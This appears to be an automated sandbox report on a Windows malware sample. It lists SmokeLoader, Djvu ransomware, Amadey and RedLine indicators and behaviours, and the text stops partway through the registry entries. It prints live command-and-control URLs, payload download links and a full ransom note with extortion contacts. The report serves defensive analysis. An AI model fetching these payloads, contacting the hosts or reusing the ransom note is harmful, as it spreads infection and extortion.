Resubmissions
27-03-2023 07:51
230327-jp31kscd46 1027-03-2023 07:48
230327-jm8s2sed6s 127-03-2023 07:35
230327-jeqmhacc77 10Analysis
-
max time kernel
693s -
max time network
696s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-de -
resource tags
arch:x64arch:x86image:win10v2004-20230220-delocale:de-deos:windows10-2004-x64systemwindows -
submitted
27-03-2023 07:51
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win10v2004-20230220-de
Errors
General
-
Target
file.exe
-
Size
269KB
-
MD5
26d85c2bdc983c43452401545f3c6007
-
SHA1
e18a2a223b91f426b5dab23b13970264d1da6ebc
-
SHA256
c8313943995590c444dac429919bc562c8f81c7d81c898fbb9bd7822dce889f4
-
SHA512
d652d2c4ab97507e0b61b37dc069b024a531b56e80f95a449d201ba6b0a1b6baecc33162be4f4a4571054295154c2c4c0a27f6831ac5dd37f0d27e3795fde3e5
-
SSDEEP
3072:Fm6fmyQA+BF8tlkC42EVOkAz+t/lB2SpYeEvyqbxDFoio56WmxeQZn78F:zQLK42EskAhS+7fyZmB
Malware Config
Extracted
smokeloader
2022
http://potunulit.org/
http://hutnilior.net/
http://bulimu55t.net/
http://soryytlic4.net/
http://novanosa5org.org/
http://nuljjjnuli.org/
http://tolilolihul.net/
http://somatoka51hub.net/
http://hujukui3.net/
http://bukubuka1.net/
http://golilopaster.org/
http://newzelannd66.org/
http://otriluyttn.org/
http://aapu.at/tmp/
http://poudineh.com/tmp/
http://firsttrusteedrx.ru/tmp/
http://kingpirate.ru/tmp/
http://hoh0aeghwugh2gie.com/
http://hie7doodohpae4na.com/
http://aek0aicifaloh1yo.com/
http://yic0oosaeiy7ahng.com/
http://wa5zu7sekai8xeih.com/
Extracted
djvu
http://zexeq.com/lancer/get.php
-
extension
.typo
-
offline_id
Yao2o6f5vNghOpgVBhEIA8O96SC5vLcgITgaRMt1
-
payload_url
http://uaery.top/dl/build2.exe
http://zexeq.com/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-f8UEvx4T0A Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@freshmail.top Reserve e-mail address to contact us: datarestorehelp@airmail.cc Your personal ID: 0672IsjO
Extracted
smokeloader
pub1
Extracted
smokeloader
sprg
Extracted
amadey
3.65
77.73.134.27/8bmdh3Slb2/index.php
Extracted
redline
koreamon
koreamonitoring.com:80
-
auth_value
1a0e1a9f491ef3df873a03577dfa10aa
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detected Djvu ransomware 16 IoCs
Processes:
resource yara_rule behavioral1/memory/1116-163-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1116-165-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4496-166-0x0000000004970000-0x0000000004A8B000-memory.dmp family_djvu behavioral1/memory/1116-167-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1116-174-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1116-193-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/3696-198-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/3696-199-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/3696-206-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/3696-207-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/3696-208-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/3696-218-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/3696-219-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/3696-216-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/3696-240-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/3696-316-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 11 IoCs
Processes:
resource yara_rule behavioral1/memory/1128-341-0x00000000052C0000-0x0000000005312000-memory.dmp family_redline behavioral1/memory/1128-344-0x00000000052C0000-0x0000000005312000-memory.dmp family_redline behavioral1/memory/1128-342-0x00000000052C0000-0x0000000005312000-memory.dmp family_redline behavioral1/memory/1128-346-0x00000000052C0000-0x0000000005312000-memory.dmp family_redline behavioral1/memory/1128-348-0x00000000052C0000-0x0000000005312000-memory.dmp family_redline behavioral1/memory/1128-351-0x00000000052C0000-0x0000000005312000-memory.dmp family_redline behavioral1/memory/1128-356-0x00000000052C0000-0x0000000005312000-memory.dmp family_redline behavioral1/memory/1128-358-0x00000000052C0000-0x0000000005312000-memory.dmp family_redline behavioral1/memory/1128-360-0x00000000052C0000-0x0000000005312000-memory.dmp family_redline behavioral1/memory/1128-362-0x00000000052C0000-0x0000000005312000-memory.dmp family_redline behavioral1/memory/1128-364-0x00000000052C0000-0x0000000005312000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
Processes:
XandETC.exeupdater.execonhost.exedescription pid process target process PID 4996 created 3172 4996 XandETC.exe Explorer.EXE PID 4996 created 3172 4996 XandETC.exe Explorer.EXE PID 4996 created 3172 4996 XandETC.exe Explorer.EXE PID 4996 created 3172 4996 XandETC.exe Explorer.EXE PID 4996 created 3172 4996 XandETC.exe Explorer.EXE PID 4736 created 3172 4736 updater.exe Explorer.EXE PID 4736 created 3172 4736 updater.exe Explorer.EXE PID 4736 created 3172 4736 updater.exe Explorer.EXE PID 4736 created 3172 4736 updater.exe Explorer.EXE PID 4736 created 3172 4736 updater.exe Explorer.EXE PID 4736 created 3172 4736 updater.exe Explorer.EXE PID 1968 created 3172 1968 conhost.exe Explorer.EXE PID 4736 created 3172 4736 updater.exe Explorer.EXE -
Downloads MZ/PE file
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Player3.exenbveek.exe2810.exeC424.bat.exeWScript.exeE3BD.exeE3BD.exe19A7.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation Player3.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation nbveek.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation 2810.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation C424.bat.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation E3BD.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation E3BD.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation 19A7.exe -
Executes dropped EXE 42 IoCs
Processes:
E3BD.exeE3BD.exeEA37.exeED16.exeE3BD.exeE3BD.exe5EE.exe851.exebuild3.exe19A7.exePlayer3.exess31.exeXandETC.exenbveek.exe2810.exePlayer3.exemstsca.exenbveek.exe88BF.exeBAFB.exeC424.bat.exeupdater.exeE048.exeF2E7.execonhost.exe394108.exenbveek.exenbveek.exe72993574041601362566.exe60711744363166210615.exentlhost.exenbveek.exenbveek.exenbveek.exenbveek.exenbveek.exewjtaraiibtarairgtarainbveek.exenbveek.exenbveek.exepid process 4496 E3BD.exe 1116 E3BD.exe 392 EA37.exe 4520 ED16.exe 212 E3BD.exe 3696 E3BD.exe 3396 5EE.exe 3676 851.exe 780 build3.exe 3048 19A7.exe 3792 Player3.exe 4092 ss31.exe 4996 XandETC.exe 4576 nbveek.exe 3796 2810.exe 5012 Player3.exe 912 mstsca.exe 2928 nbveek.exe 1128 88BF.exe 2904 BAFB.exe 3328 C424.bat.exe 4736 updater.exe 5064 E048.exe 3924 F2E7.exe 1968 conhost.exe 1312 394108.exe 780 nbveek.exe 652 nbveek.exe 2064 72993574041601362566.exe 3776 60711744363166210615.exe 5104 ntlhost.exe 4340 nbveek.exe 5028 nbveek.exe 1172 nbveek.exe 3776 nbveek.exe 1940 nbveek.exe 1908 wjtarai 3844 ibtarai 5080 rgtarai 324 nbveek.exe 4164 nbveek.exe 2936 nbveek.exe -
Loads dropped DLL 5 IoCs
Processes:
rundll32.exerundll32.exerundll32.exeAddInProcess32.exepid process 5060 rundll32.exe 4256 rundll32.exe 1460 rundll32.exe 4124 AddInProcess32.exe 4124 AddInProcess32.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
Processes:
dllhost.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook dllhost.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
E3BD.exe60711744363166210615.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\4dbd1898-d200-4d2a-b39c-a640ea533983\\E3BD.exe\" --AutoStart" E3BD.exe Set value (str) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" 60711744363166210615.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 96 api.2ip.ua 114 api.2ip.ua 95 api.2ip.ua -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
BAFB.exedescription ioc process File opened for modification \??\PHYSICALDRIVE0 BAFB.exe -
Drops file in System32 directory 3 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
E048.exepid process 5064 E048.exe 5064 E048.exe 5064 E048.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
E3BD.exeE3BD.exeupdater.exeF2E7.exedescription pid process target process PID 4496 set thread context of 1116 4496 E3BD.exe E3BD.exe PID 212 set thread context of 3696 212 E3BD.exe E3BD.exe PID 4736 set thread context of 1968 4736 updater.exe conhost.exe PID 4736 set thread context of 4412 4736 updater.exe conhost.exe PID 3924 set thread context of 4124 3924 F2E7.exe AddInProcess32.exe -
Drops file in Program Files directory 4 IoCs
Processes:
XandETC.exeupdater.execmd.execmd.exedescription ioc process File created C:\Program Files\Notepad\Chrome\updater.exe XandETC.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 3212 sc.exe 4260 sc.exe 3440 sc.exe 4232 sc.exe 2204 sc.exe 792 sc.exe 3720 sc.exe 1708 sc.exe 2148 sc.exe 924 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 7 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 1312 4520 WerFault.exe ED16.exe 3856 3676 WerFault.exe 851.exe 1908 3796 WerFault.exe 2810.exe 4064 1460 WerFault.exe rundll32.exe 4160 5064 WerFault.exe E048.exe 2016 3844 WerFault.exe ibtarai 1780 5080 WerFault.exe rgtarai -
Checks SCSI registry key(s) 3 TTPs 15 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
file.exetaskmgr.exe5EE.exewjtaraiEA37.exedescription ioc process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI file.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 5EE.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI wjtarai Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI EA37.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 5EE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI EA37.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI EA37.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 5EE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI wjtarai Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI file.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI file.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI wjtarai -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
dllhost.exeAddInProcess32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 dllhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dllhost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AddInProcess32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString AddInProcess32.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 1844 schtasks.exe 4832 schtasks.exe 4160 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 4056 timeout.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
Processes:
description flow ioc HTTP User-Agent header 393 Go-http-client/1.1 -
Processes:
Explorer.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.execonhost.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe -
Modifies registry class 29 IoCs
Processes:
Explorer.EXEC424.bat.exetaskmgr.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\NodeSlot = "1" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = ffffffff Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings C424.bat.exe Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings taskmgr.exe Set value (data) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 50003100000000007b56914e10004c6f63616c003c0009000400efbe5456c7957b56924e2e000000a4e1010000000100000000000000000000000000000076a722004c006f00630061006c00000014000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local 